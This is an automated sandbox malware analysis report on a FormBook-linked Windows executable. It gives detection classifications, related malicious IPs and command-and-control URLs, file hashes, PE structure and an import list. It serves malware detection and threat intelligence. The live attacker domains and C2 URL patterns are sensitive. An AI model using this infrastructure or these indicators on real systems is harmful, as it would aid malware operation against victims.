                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 41s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:BDlwy8b7Km.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@6/5
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 43
                                                • Number of non-executed functions: 286
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target FKUPIibLrFYhJ.exe, PID 4484 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • VT rate limit hit for: BDlwy8b7Km.exe
                                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.57.65.76 | 4p5XLVXJnq.exe | malicious | FormBook | www.newbh.pro/67jc/
176.57.65.76 | SLq0ulC3Wf.exe | malicious | FormBook | www.newbh.pro/67jc/
176.57.65.76 | k9OEsV37GE.exe | malicious | FormBook | www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF
176.57.65.76 | XeFYBYYj0w.exe | malicious | FormBook | www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz
176.57.65.76 | J1VpshZJfm.exe | malicious | FormBook | www.newbh.pro/z9pt/
47.83.1.90 | k9OEsV37GE.exe | malicious | FormBook | www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF
47.83.1.90 | XeFYBYYj0w.exe | malicious | FormBook | www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
47.83.1.90 | FG5wHs4fVX.exe | malicious | FormBook | www.cloijz.info/r4db/
47.83.1.90 | KcSzB2IpP5.exe | malicious | FormBook | www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
47.83.1.90 | smQoKNkwB7.exe | malicious | FormBook | www.cloijz.info/r4db/
47.83.1.90 | 1162-201.exe | malicious | FormBook | www.ripbgs.info/hf4a/
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.cruycq.info/6jon/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.aoivej.info | k9OEsV37GE.exe | malicious | FormBook | 47.83.1.90
www.aoivej.info | XeFYBYYj0w.exe | malicious | FormBook | 47.83.1.90
www.gern.dev | k9OEsV37GE.exe | malicious | FormBook | 185.151.30.223
www.gern.dev | XeFYBYYj0w.exe | malicious | FormBook | 185.151.30.223
www.gern.dev | J1VpshZJfm.exe | malicious | FormBook | 185.151.30.223
www.givvjn.info | k9OEsV37GE.exe | malicious | FormBook | 47.83.1.90
www.givvjn.info | XeFYBYYj0w.exe | malicious | FormBook | 47.83.1.90
www.givvjn.info | QUOTATION#050125.exe | malicious | FormBook | 47.83.1.90
www.givvjn.info | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 47.83.1.90
www.givvjn.info | QUOTATION#050125.exe | malicious | FormBook | 47.83.1.90
www.thinkone.xyz | k9OEsV37GE.exe | malicious | FormBook | 209.74.79.41
www.thinkone.xyz | XeFYBYYj0w.exe | malicious | FormBook | 209.74.79.41
www.newbh.pro | 4p5XLVXJnq.exe | malicious | FormBook | 176.57.65.76
www.newbh.pro | SLq0ulC3Wf.exe | malicious | FormBook | 176.57.65.76
www.newbh.pro | k9OEsV37GE.exe | malicious | FormBook | 176.57.65.76
www.newbh.pro | XeFYBYYj0w.exe | malicious | FormBook | 176.57.65.76
www.newbh.pro | J1VpshZJfm.exe | malicious | FormBook | 176.57.65.76
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VODANETInternationalIP-BackboneofVodafoneDE | k9OEsV37GE.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | XeFYBYYj0w.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | 6.elf | malicious | Unknown | 82.82.131.16
VODANETInternationalIP-BackboneofVodafoneDE | FG5wHs4fVX.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | KcSzB2IpP5.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | smQoKNkwB7.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | 1162-201.exe | malicious | FormBook | 47.83.1.90
VODANETInternationalIP-BackboneofVodafoneDE | 5.elf | malicious | Unknown | 88.79.50.180
VODANETInternationalIP-BackboneofVodafoneDE | 6.elf | malicious | Unknown | 178.10.231.77
VODANETInternationalIP-BackboneofVodafoneDE | armv4l.elf | malicious | Unknown | 88.68.235.154
TELINEABA | 4p5XLVXJnq.exe | malicious | FormBook | 176.57.65.76
TELINEABA | SLq0ulC3Wf.exe | malicious | FormBook | 176.57.65.76
TELINEABA | k9OEsV37GE.exe | malicious | FormBook | 176.57.65.76
TELINEABA | XeFYBYYj0w.exe | malicious | FormBook | 176.57.65.76
TELINEABA | J1VpshZJfm.exe | malicious | FormBook | 176.57.65.76
TELINEABA | belks.arm.elf | malicious | Mirai | 88.214.61.247
TELINEABA | belks.mpsl.elf | malicious | Mirai | 88.214.61.239
TELINEABA | na.elf | malicious | Mirai | 88.214.61.214
TELINEABA | ImBm40hNZ2.exe | malicious | FormBook, GuLoader | 176.57.64.102
TELINEABA | 220204-TF1--00.exe | malicious | FormBook | 176.57.64.102
MULTIBAND-NEWHOPEUS | wSoShbuXnJ.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | 4p5XLVXJnq.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | BLv4mI7zzY.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | SLq0ulC3Wf.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | ZcshRk2lgh.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | ydJaT4b5N8.exe | malicious | FormBook | 209.74.79.42
MULTIBAND-NEWHOPEUS | BalphRTkPS.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 209.74.77.109
MULTIBAND-NEWHOPEUS | suBpo1g13Q.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | k9OEsV37GE.exe | malicious | FormBook | 209.74.79.41
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\relog.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                Category:dropped
                                                Size (bytes):114688
                                                Entropy (8bit):0.9746603542602881
                                                Encrypted:false
                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287232
                                                Entropy (8bit):7.994108818584018
                                                Encrypted:true
                                                SSDEEP:6144:3gPxbZfKcSe5yj3nkyTEVR9jsrufq7KYVm7HTfl/+mspnnEV:QDiCs3kyQfs+qMQY
                                                MD5:3D8D7C0F5764C92EE052E7489C96966F
                                                SHA1:23C9DFF41E3D869AF2F3B7D93F4D1833C7ABA892
                                                SHA-256:71D87CD6CB706CAFBC1DEF496DD7BE895578714A578A24876EEAF1301B25810E
                                                SHA-512:E9D3E9CA20E628D2195312F230A1166B068D170C6A0411EEE8859628AF484B5A6DF0CB5C51D733178AD6ACF5D1B1B0873598A3DD391DA5419A7C45DADBD7996D
                                                Malicious:false
                                                Reputation:low
                                                Preview:...YLVVQ<E1O..16.Y5KUEWK.5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN.6OY;T.KW.D.x.W....Y&=nAD >G*8e4*#[6;v44.7D!n'_...fk8*3.c8TErVQ8E1ON70?.dU,.x7,..9(.L..../).+...+2.M...e/1..Q&Yr.).6OY5KUEW..5Y.WWQ..`/NN16OY5K.EUJF4ROV.U8E1ONN16OY!KUEGKM59KVVQxE1_NN14OY3KUEWKM5_OVVQ8E1O.J16MY5KUEWIMu.OVFQ8U1ONN!6OI5KUEWK]5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY.?0=#KM5..RVQ(E1O.J16_Y5KUEWKM5YOVVQ.E1/NN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1
                                                Process:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287232
                                                Entropy (8bit):7.994108818584018
                                                Encrypted:true
                                                SSDEEP:6144:3gPxbZfKcSe5yj3nkyTEVR9jsrufq7KYVm7HTfl/+mspnnEV:QDiCs3kyQfs+qMQY
                                                MD5:3D8D7C0F5764C92EE052E7489C96966F
                                                SHA1:23C9DFF41E3D869AF2F3B7D93F4D1833C7ABA892
                                                SHA-256:71D87CD6CB706CAFBC1DEF496DD7BE895578714A578A24876EEAF1301B25810E
                                                SHA-512:E9D3E9CA20E628D2195312F230A1166B068D170C6A0411EEE8859628AF484B5A6DF0CB5C51D733178AD6ACF5D1B1B0873598A3DD391DA5419A7C45DADBD7996D
                                                Malicious:false
                                                Preview:...YLVVQ<E1O..16.Y5KUEWK.5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN.6OY;T.KW.D.x.W....Y&=nAD >G*8e4*#[6;v44.7D!n'_...fk8*3.c8TErVQ8E1ON70?.dU,.x7,..9(.L..../).+...+2.M...e/1..Q&Yr.).6OY5KUEW..5Y.WWQ..`/NN16OY5K.EUJF4ROV.U8E1ONN16OY!KUEGKM59KVVQxE1_NN14OY3KUEWKM5_OVVQ8E1O.J16MY5KUEWIMu.OVFQ8U1ONN!6OI5KUEWK]5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY.?0=#KM5..RVQ(E1O.J16_Y5KUEWKM5YOVVQ.E1/NN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1ONN16OY5KUEWKM5YOVVQ8E1
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.023010207224862
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:BDlwy8b7Km.exe
                                                File size:1'334'784 bytes
                                                MD5:95b9d05f97fba1718d8c85967ebffc4c
                                                SHA1:8752f152236cf941e59aff72b182c5afc205927e
                                                SHA256:9e39a50469e60d2c9d851e9cd2b35c298a5990f1ab1ab57faba228ed32a814f3
                                                SHA512:d42d816e7d7fa8885aee1a173a371d315cf3283eae92677675c4d6f06ca199c633136cb7389bea1184aaf384a358b938b2d7c3d7ce1d518e7bfe5515531215e0
                                                SSDEEP:24576:PqDEvCTbMWu7rQYlBQcBiT6rprG8aMbSKqC6+mq4wELb:PTvC/MTQYxsWR7aMbLqC6+t
                                                TLSH:EF55C0027381D062FF9B91730F5AF61146BD6E6A0127A51F23983D7ABE701B2163E763
                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                Icon Hash:1c4c898989a581ab
                                                Entrypoint:0x420577
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x67615F2B [Tue Dec 17 11:23:23 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:948cc502fe9226992dce9417f952fce3
                                                Instruction
                                                call 00007F48184CDFB3h
                                                jmp 00007F48184CD8BFh
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                push dword ptr [ebp+08h]
                                                mov esi, ecx
                                                call 00007F48184CDA9Dh
                                                mov dword ptr [esi], 0049FDF0h
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                and dword ptr [ecx+04h], 00000000h
                                                mov eax, ecx
                                                and dword ptr [ecx+08h], 00000000h
                                                mov dword ptr [ecx+04h], 0049FDF8h
                                                mov dword ptr [ecx], 0049FDF0h
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                push dword ptr [ebp+08h]
                                                mov esi, ecx
                                                call 00007F48184CDA6Ah
                                                mov dword ptr [esi], 0049FE0Ch
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                and dword ptr [ecx+04h], 00000000h
                                                mov eax, ecx
                                                and dword ptr [ecx+08h], 00000000h
                                                mov dword ptr [ecx+04h], 0049FE14h
                                                mov dword ptr [ecx], 0049FE0Ch
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                mov esi, ecx
                                                lea eax, dword ptr [esi+04h]
                                                mov dword ptr [esi], 0049FDD0h
                                                and dword ptr [eax], 00000000h
                                                and dword ptr [eax+04h], 00000000h
                                                push eax
                                                mov eax, dword ptr [ebp+08h]
                                                add eax, 04h
                                                push eax
                                                call 00007F48184D065Dh
                                                pop ecx
                                                pop ecx
                                                mov eax, esi
                                                pop esi
                                                pop ebp
                                                retn 0004h
                                                lea eax, dword ptr [ecx+04h]
                                                mov dword ptr [ecx], 0049FDD0h
                                                push eax
                                                call 00007F48184D06A8h
                                                pop ecx
                                                ret
                                                push ebp
                                                mov ebp, esp
                                                push esi
                                                mov esi, ecx
                                                lea eax, dword ptr [esi+04h]
                                                mov dword ptr [esi], 0049FDD0h
                                                push eax
                                                call 00007F48184D0691h
                                                test byte ptr [ebp+08h], 00000001h
                                                pop ecx
                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x6f3cc | .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x144000 | 0x7594 | .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                 .rsrc | 0xd4000 | 0x6f3cc | 0x6f400 | 630e6d0e92f95a7448e8884d237fcf99 | False | 0.8017490344101124 | data | 7.4855565575544105 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc | 0x144000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                 RT_ICON | 0xd4350 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                 RT_ICON | 0xd4478 | 0x16b70 | Device independent bitmap graphic, 150 x 300 x 32, image size 90000 | English | Great Britain | 0.10503009458297506
                                                 RT_STRING | 0xeafe8 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                 RT_STRING | 0xeb57c | 0x68a | data | English | Great Britain | 0.2735961768219833
                                                 RT_STRING | 0xebc08 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                 RT_STRING | 0xec098 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                 RT_STRING | 0xec694 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                 RT_STRING | 0xeccf0 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                 RT_STRING | 0xed158 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                 RT_RCDATA | 0xed2b0 | 0x55c27 | data | | | 1.00033022936707
                                                 RT_GROUP_ICON | 0x142ed8 | 0x14 | data | English | Great Britain | 1.25
                                                 RT_GROUP_ICON | 0x142eec | 0x14 | data | English | Great Britain | 1.15
                                                 RT_VERSION | 0x142f00 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                 RT_MANIFEST | 0x142fdc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                 DLL | Import
                                                 WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                 VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                 WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                 COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                 MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                 WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                 PSAPI.DLL | GetProcessMemoryInfo
                                                 IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                 USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                 UxTheme.dll | IsThemeActive
                                                 KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
